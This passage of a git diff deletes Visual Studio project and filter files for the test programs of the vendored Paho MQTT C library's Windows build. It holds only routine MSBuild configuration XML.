-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)..\build\output\test\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3a.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3a.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3a.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3a.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\MQTTAsync.h" />

-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\test\test4.c" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test4/test4.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/test4/test4.vcxproj.filters
deleted file mode 100644
index 6ea29d7..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test4/test4.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\test\test4.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test5/test5.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/test5/test5.vcxproj
deleted file mode 100755
index f0ee0b2..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test5/test5.vcxproj
+++ /dev/null
@@ -1,173 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>test1</RootNamespace>

-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)..\build\output\test\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src;$(OpenSSLDir)\include</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3as.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src;$(OpenSSLDir)\include</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3as.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src;$(OpenSSLDir)\include</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3as.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src;$(OpenSSLDir)\include</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3as.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\MQTTAsync.h" />

-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\test\test5.c" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test5/test5.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/test5/test5.vcxproj.filters
deleted file mode 100644
index a9e956e..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test5/test5.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\test\test5.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test9/test9.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/test9/test9.vcxproj
deleted file mode 100644
index 19d966f..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test9/test9.vcxproj
+++ /dev/null
@@ -1,170 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{D133C05E-87A6-48C6-A703-188A83B82400}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>test9</RootNamespace>
-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\test\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\test\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3a.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3a.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
